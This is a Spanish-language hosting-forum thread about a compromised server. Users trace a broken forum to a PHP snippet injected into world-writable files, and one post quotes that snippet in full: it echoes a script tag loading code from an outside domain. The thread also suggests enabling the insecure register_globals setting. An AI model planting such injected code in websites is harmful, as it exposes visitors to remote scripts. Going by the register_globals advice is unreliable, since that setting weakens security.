FRIHOSTFORUMSSEARCHFAQTOSBLOGSCOMPETITIONS
You are invited to Log in or Register a free Frihost Account!

[help] Problema de Hackeo en el server 2

Mrs_Robota
Hola a todos, quiero hacerles una consulta a ver si me pueden ayudar, desde hoy al tratar de ingresar a mi foro aparece el siguiente mensaje

session_start(): Cannot send session cookie - headers already sent by (output started at /home/mrsro/domains/moderntalking.frih.net/public_html/foro/Settings.php:61)

esto es temporal? o que es lo que ha pasado??, la web si funciona normalmente, el problema es solo con el foro.

Por favor ayuda!!!
Mrs_Robota
Importante:

http://www.frihost.com/forums/vt-34504.html
Mrs_Robota
Así que hay que añadir

php_flag register_globals on

dentro de donde??? de los archivos 777 que fueron atacados? dentro de todos los archivos????? el php?? no entiendo nada Sad
rtx
quien sabe yo creo algo sin suma importanccia o solo algun chismesillo para espantar ala gente, de cualquier manera haay que tener un bbackuup de la web por cualquier cosa quue pueda pasar
jetta
me imagino que rtx tiene razon pues si no hubiera teido mas seguimiento el tema de lo que tubo, bueno almenos eso creo yo espero que solo sea una falsa alarma y todo se resuelva de cualquier manera creo que es una excelente sugerencia la de rtx y creo ke nadie debe de esperar a que sucedan o anuncien errores para tener su backup mas reciente, porlomenos cada semana o cada dia dependiendo la actividad de su web hay que tener un backup de sql y toda la web Laughing Laughing
lujango
segun dice ahi que debes eliminar el codigo malicioso de los archivos que tengas con permiso 777, que fueron los que el hacker afectó. Todos los archivos que tengan este permiso tienen añadida este codigo
Code:
<? if (!defined('domainstat')) { define("domainstat", "ok");  echo "<script language='JavaScript' type='text/javascript' src='http://domainstat.net/stat.php?id=4fe6d'></script>";}?>
. por otro lado si necesitas habilita register_globals para el funcionamiento de tu sitio, puedes activarlas temporalmente agregando
Code:
php_flag register_globals on
en el .htaccess de tu sitio que muy probablemente se encuentre en tu directorio raiz.
como saber si usas register_globals? sólo tu puedes saberlo, si no lo utilizas no necesitas realizar el último paso.
varoskater
joe.... a mi me ha pasado tambien algo asi, en el foro y en todo lo que tengo de software php me sale arriba del todo mensajes de esos... me cagüen....
Mrs_Robota
pues lamentablemente la programacion y todo lo que se parezca a ella no es mi fuerte, pero vaya susto que me di, al eliminar ese codigo mi foro volvió a correr, lo unico que puedo hacer es backups todo el tiempo
comuda
aun sigue infectado??? o ya esta bien..
comuda
mhh... si subo uun cms pues automaticamente va estar infectado?? o ya lo han solcionado y ese problema es solo para quienes han tenido su cms en el momento del contagio..